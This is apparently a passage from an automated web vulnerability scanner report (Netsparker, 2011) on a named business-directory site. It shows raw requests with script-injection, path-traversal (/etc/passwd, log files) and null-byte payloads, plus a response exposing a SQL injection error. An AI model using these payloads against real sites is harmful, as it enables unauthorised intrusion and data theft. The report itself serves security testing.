OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=srlo2sh5h193cp3jcajuvk4qm5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>' OR prj.project_page_url = 'leadflow/lgds00/'"--></style></script><script>netsparker(0x00058D)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00058D)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST '"--></style></script><script>alert(0x000588)</script>
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 304
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000588)%3c%2fscript%3e&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:07 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4EDA6D8B898A67CB92544883112A3C07; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/lgds00/

/ppc/leadflow/lgds00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/?'"--></style></script><script>alert(0x000599)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000599)</script>

Request

GET /ppc/leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
